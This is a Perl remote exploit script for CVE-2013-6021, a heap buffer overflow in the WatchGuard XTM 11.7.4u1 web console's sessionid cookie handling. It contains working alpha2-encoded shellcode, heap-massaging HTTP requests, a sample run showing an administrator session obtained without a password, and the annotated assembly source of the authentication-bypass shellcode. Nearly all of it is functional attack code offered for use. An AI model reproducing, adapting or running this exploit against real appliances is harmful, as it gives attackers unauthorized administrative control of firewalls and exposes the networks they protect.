#!/usr/bin/perl -w =header ********************************************************************* ** WatchGuard Firewall XTM version 11.7.4u1 ** ** Remote buffer overflow exploit ~ sessionid cookie ** ********************************************************************* ** ** ** Author: jerome.nokin@gmail.com ** ** Blog: http://funoverip.net ** ** CVE: CVE-2013-6021 ** ** ** ********************************************************************* ** ** ** - Bug, exploit & shellcode details available on: ** ** http://funoverip.net/?p=1519 ** ** ** ** - Decoded shellocde can be found at the end of this file ** ** ** ********************************************************************* =cut =output sample [*] Sending HTTP ping request to https://192.168.60.200:8080 : OK. Got 'pong' [*] Checking sessionid cookie for bad chars [*] Checking shellcode for bad chars [*] Heap messaging (request 1) : ... [*] Sending authentication bypass shellcode (request 2) [*] HTTP Response : -------------------------------------------------------------------------------- HTTP/1.1 200 OK Content-type: text/xml Set-Cookie: sessionid=6B8B4567327B23C6643C98696633487300000014 Date: Sun, 27 Oct 2013 21:11:38 GMT Server: none Content-Length: 751 <?xml version="1.0"?> <methodResponse> <params> <param> <value> <struct> <member><name>sid</name><value>6B8B4567327B23C6643C98696633487300000014</value></member> <member><name>response</name><value></value></member> <member> <name>readwrite</name> <value><struct> <member><name>privilege</name><value>2</value></member> <member><name>peer_sid</name><value>0</value></member> <member><name>peer_name</name><value>error</value></member> <member><name>peer_ip</name><value>0.0.0.0</value></member> </struct></value> </member> </struct> </value> </param> </params> </methodResponse> -------------------------------------------------------------------------------- [*] Over. =cut use warnings; use strict; use IO::Socket::SSL; # host and port of the XTM web console my $host = "192.168.60.200"; my $port = "8080"; # Shellcode (watch out bad chars) my $shellcode = # shellcode: bypass password verification and return a session cookie "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIMQJdYHfas030mQ" . "KusPQWVoEPLKK5wtKOKOkOnkMM4HkO9okOoOePXpwuuXOsJgs4LMbWUTk1KNs04PUX" . "eXD4tKTyvgQeZNGIaOgtptC78kM7X8VXGK6fWxnmPGL0MkzTKoVegxmYneidKNKOkO" . "9WK5HxkNYoyoUPuP7pGpNkCpvlk9k5UPIoKO9oLKnmL4KNyoKOlKk5qx9nioioLKNu" . "RLKNioYoMY3ttdc4NipTq4VhMYTL14NazLxPERuP30oqzMn0G54OuPmkXtyOeUtHlK" . "sevhnkRrc8HGW47TeTwpuPEPgpNi4TwTMnNpZyuTgxKOn6K90ELPNkQU7xLKg0r4oy" . "ctQ45TlMK35EISKOYoMYWt14MnppMfUTWxYohVk3KpuWMY0Empkw0ENXwtgpuPC0lK" . "benpLKSpF0IWPDQ4Fh30s0Wp5PlMmCrMo3KO9olIpTUts4nic44dMnqnyPUTTHKOn6" . "LIbeLXSVIW0EMvVb5PKw3uNt7pgpWpuPiWpEnluPWpwpGpOO0KzN34S8kOm7A"; # Shellocde max length my $shellcode_max_len = 2000; # set our shellcode address into EAX (expected by alpha2 encoder) my $alpha2_ecx24 = "\x8b\x41\x24" . # mov eax, [ecx+0x24] "\x29\xd0" . # sub eax, edx ; (edx is updated by nopsled) "\x83\xc0\x40" . # add eax, 0x40 "\x83\xe8\x35"; # sub eax, 0x35 # for the reader, "add eax, edx" contains bad chars. # This is the reason why the nopsled decrement EDX and that we use "dec eax, edx" # flush after every write $| = 1; # HTTP POST data for authentication request my $login_post_data = "<methodCall><methodName>login</methodName><params><param><value><struct><member>" . "<name>password</name><value><string>foo</string></value></member><member>" . "<name>user</name><value><string>admin</string></value></member></struct></value>" . "</param></params></methodCall>"; # list of bad characters my @badchars = ( "\x00", "\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x0a", "\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13", "\x14", "\x15", "\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c", "\x1d", "\x1e", "\x1f", "\x20", "\x22", "\x26", "\x27", "\x3b" # cookie delimiters ); # function: Check input for badchars. sub check_badchars { my $in = shift; my $stop = 0; for(my $i=0; $i<length($in); $i++){ my $c = substr($in,$i,1); if($c ~~ @badchars){ printf " - bad char '0x%02x' found\n", ord($c); $stop = 1; } } if($stop){ exit; } } # function: testing remote connectivity with the appliance # send HTTP "ping" request and expect "pong" reply sub testing_connectivity { print "[*] Sending HTTP ping request to https://$host:$port : "; my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!"; if($sock){ my $req = "GET /ping HTTP/1.0\r\n" . "Host:$host:$port" . "\r\n" . "\r\n"; # send ping print $sock $req; my $resp=''; my $pong = 0; # read answer while (my $line = <$sock>){ if($line =~ /pong/) { $pong = 1;} $resp .= $line; } # got pong ? if($pong){ print "OK. Got 'pong'\n"; }else{ print "ERROR. Expecting 'pong' response but received :\n"; print $resp; exit; } close $sock; }else{ print "ERROR: Socket failed !\n"; exit; } } # function: HTTP request used for HEAP messaging phase sub building_request_step1 { my $sessionid = "A" x 120; # do not overflow now my $req = "POST /agent/ping HTTP/1.1\r\n" . "Host:$host:$port" . "\r\n" . "User-Agent: " . "a" x 100 . "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0 " . "a" x 100 . "\r\n" . "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, " . "a" x 992 . "\r\n" . "Accept-Language: en-gb,en;q=0.5" . "a" x 200 . "\r\n" . "Cookie: sessionid=" . $sessionid . "\r\n" . "Accept-Charset: utf-8\r\n" . "Content-Type: application/xml\r\n" . "Content-Length: 3\r\n" . "\r\n" . "foo" ; return $req; } # function: HTTP request used for buffer overflow exploitation sub building_request_step2 { my $sessionid = "A" x 140 . # junk "\x44\x85" ; # off by 2 overflow to reach 0x8068544 (on the heap). # 0x8068544 contains a "good memory chunk" which satisfy all rules print "[*] Checking sessionid cookie for bad chars\n"; check_badchars($sessionid); my $req = "POST /agent/ping HTTP/1.1\r\n" . "Host:$host:$port" . "\r\n" . "User-Agent: " . "a" x 1879 . "\r\n" . "Connection: keep-alive" . "a" x 22 . "\x4a" x ($shellcode_max_len - length($shellcode) - length($alpha2_ecx24)) . # nops $alpha2_ecx24 . # set EAX to shellcode addr $shellcode . # shellcode "\r\n" . "Accept-Encoding: identity," . "b" x 1386 . "\r\n" . "Cookie: sessionid=" . $sessionid . "\r\n" . "Accept-Charset: utf-8\r\n" . "Content-Type: application/xml\r\n" . "Content-Length: " . length($login_post_data). "\r\n" . "\r\n" . $login_post_data ; return $req; } # function: Send an HTTP request. sub send_http_request { my $req = shift; my $read_answer = shift || 0; my $http_resp=''; # Open socket my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!"; if($sock){ print $sock $req; # do we need the answer ? if ($read_answer){ my $is_chunked = 0; my $is_body = 0; while(my $line = <$sock>){ if($line =~ /Transfer-Encoding: chunked/){ $is_chunked = 1; next; } if($line eq "\r\n"){ # we reached the body if($is_chunked){ $line = <$sock>; # chunk length $line =~ s/\r\n//g; $sock->read(my $data, hex($line)); # read chunk $http_resp .= sprintf "Content-Length: %d\r\n\r\n", hex($line); $http_resp .= $data; close $sock ; return $http_resp; } } $http_resp .= $line; } } close $sock; }else{ print "ERROR: Socket failed !\n"; exit; } return $http_resp; } ### MAIN #### # print banner print << 'EOF'; ********************************************************** ** WatchGuard Firewall XTM version 11.7.4u1 ** ** Remote buffer overflow exploit ~ sessionid cookie ** ********************************************************** ** ** ** Author: jerome.nokin@gmail.com ** ** Blog: http://funoverip.net ** ** CVE: CVE-2013-6021 ** ** ** ********************************************************** ** ** ** Bug, exploit & shellcode details available on: ** ** http://funoverip.net/?p=1519 ** ** ** ********************************************************** EOF # Send an HTTP ping request testing_connectivity(); # building HTTP requests my $request_step1 = building_request_step1(); my $request_step2 = building_request_step2(); # Testing shellcode against bad cahrs print "[*] Checking shellcode for bad chars\n"; check_badchars($shellcode); # Fillin the heap print "[*] Heap messaging (request 1) : "; for(my $i=0 ; $i<3 ; $i++){ send_http_request($request_step1); print "."; } print "\n"; # Exploiting print "[*] Sending authentication bypass shellcode (request 2)\n"; my $resp = send_http_request($request_step2,1); print "[*] HTTP Response : \n\n"; print "-" x 80 . "\n"; print $resp; print "-" x 80 . "\n\n"; print "[*] Over.\n"; exit; =shellcode ;------------------------------------------------ ; shellcode-get-gession.asm ; by Jerome Nokin for XTM(v) 11.7.4 update 1 ;------------------------------------------------ global _start _start: ; current EBP/ESP values ;------- ; esp 0x3ff0b518 ; ebp 0x3ff0b558 ; first, fix the stack in HTTP_handle_request function ; ------- ; esp 0x3ff0b6f0 ; ebp 0x3ffffcb8 ; we'll do ;--------- ;$ perl -e 'printf "%x\n", 0x3ff0b518 + 472' ; 3ff0b6f0 ; ESP = ESP + 472 ;$ perl -e 'printf "%x\n", 0x3ff0b558 + 1001312' ; 3ffffcb8 ; EBP = EBP + 1001312 ; fix ESP/EBP add esp, 472 add ebp, 1001312 ; fixing overwritten ptrs ; finding initial malloc pointer v50 (overwritten) ; 0805f000-08081000 rwxp 00000000 00:00 0 [heap] ; v54 and v55 have not been overwritten and contain *(v50+0x10) and *(v50+0x14) ; example inside gdb ;b *0x8051901 ;b *0x80519c0 ;(gdb) x/xw $ebp-0xf8 <===== v55 ;0x3ffffbc0: 0x08065b90 ;(gdb) x/xw $ebp-0xfc <===== v54 ;0x3ffffbbc: 0x08067fe0 ;(gdb) find /w 0x08060000, 0x0806ffff, 0x08067fe0, 0x08065b90 <==== search seq on heap ;0x8063b48 ;1 pattern found. ;(gdb) x/xw 0x8063b48-0x10 <==== initial malloc ptr (v50) is at 0x8063b48-0x10 ;0x8063b38: 0x00000001 ; search this sequence on the heap mov eax, [ebp-0xfc] ; v54 mov ebx, [ebp-0xf8] ; v55 mov edi, 0x0805f000 ; heap start addr loop: add edi, 4 lea esi, [edi+4] cmp esi, 0x08081000 ; edi is out of the heap ? je loop_end cmp [edi], eax ; cmp v54 jne loop cmp [edi+4], ebx ; cmp v55 je found jmp loop loop_end: mov eax, 0x08063b38 ; default value (should not be reached) found: lea eax, [edi-0x10] ; eax = v50 address (malloc ptr addr) ; EBP-0x10c ; saved content of v50 (malloc) = ebp-0x10c mov [ebp-0x10c], eax ; reset EBX (see following) ; 805185c: e8 95 43 00 00 call 8055bf6 <wga_signal+0x784> ; 8051861: 81 c3 93 c7 00 00 add ebx,0xc793 ; .... ; 8055bf6: 8b 1c 24 mov ebx,DWORD PTR [esp] ; 8055bf9: c3 ret mov ebx, 0x805dff4 ; EBP-0x108 ; just reset it to 0 mov dword [ebp-0x108], 0x0 ; EBP-0x100 ; 80519b1: 8b 40 0c mov eax,DWORD PTR [eax+0xc] ; 80519b4: 89 85 00 ff ff ff mov DWORD PTR [ebp-0x100],eax mov eax, [eax+0xc] mov [ebp-0x100], eax ; simulate call to login function. copy args mov ecx, [ebp-0x10c] mov eax, [ebp-0x198] mov edx, [ebp-0x194] mov [esp+0x4],eax mov [esp+0x8],edx mov [esp],ecx ; Now setup the login function stack ; current esp/ebp ; ---------------- ; esp 0x3ff0b6f0 ; ebp 0x3ffffcb8 ; we want to land into the login function ; --------------------------------------- ; esp 0x3ff0b420 ; ebp 0x3ff0b6e8 ; we'll do ;--------- ; $ perl -e ' printf "%x\n", 0x3ff0b6f0 - 720' ; 3ff0b420 ; ESP = ESP - 720 ; $ perl -e ' printf "%x\n", 0x3ffffcb8 - 1000912' ; 3ff0b6e8 ; EBP = EBP - 1000912 ; stack fix sub esp, 720 sub ebp, 1000912 ; EBX -> .GOT (same as above btw) mov ebx, 0x805dff4 ; simulate "decode HTTP content" fct, at top of the login function mov edx, [ebp+0x8] mov edx, [edx+0x8] mov dword [esp+0x4], 0x0 ; no content_encoding header mov [esp], edx mov esi, 0x0804d990 call esi ; decode content mov [ebp-0x70],eax ; int decoded_content; // [sp+258h] [bp-70h]@1 ; simulate "search remote_address" mov eax, [ebp+0x8] mov eax, [eax+0x14] mov [esp+0x4],eax lea eax,[ebx-0x3ceb] mov [esp],eax mov esi, 0x804b670 ;FCGX_GetParam call esi add eax, 0x7 ; remove '::ffff:' ====> to improve mov [ebp-0x60], eax ; is_admin = 4 mov dword [ebp-0x48], 0x4 ; simulate "search req_user value" mov eax, [ebp-0x70] mov eax, [eax+0x50] mov dword [esp+0x8],0x0 lea edx,[ebx-0x3c93] mov [esp+0x4],edx mov [esp],eax mov esi, 0x804c07e call esi ; <FCGX_PutStr@plt+0x3de> mov [ebp-0x68],eax ; v49 = 2 (ipv4) mov word [ebp-0x5a], 0x2 ; unsigned __int16 v49; // [sp+26Eh] [bp-5Ah]@1 ; challenge mov dword [ebp-0x6c], 0x0 ; const char *req_challenge; // [sp+25Ch] [bp-6Ch]@1 ; set v43 to null mov dword [ebp-0x74], 0x0 ;int v43; // [sp+254h] [bp-74h]@1 ; ok, we are ready to jump in the middle of the "login" function ; right after the password verification ; jump here ; 804ee4b: c7 44 24 04 00 12 00 mov DWORD PTR [esp+0x4],0x1200 ; 804ee52: 00 ; 804ee53: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1 ; 804ee5a: e8 11 c4 ff ff call 804b270 <calloc@plt> mov edi, 0x804ee4b jmp edi =cut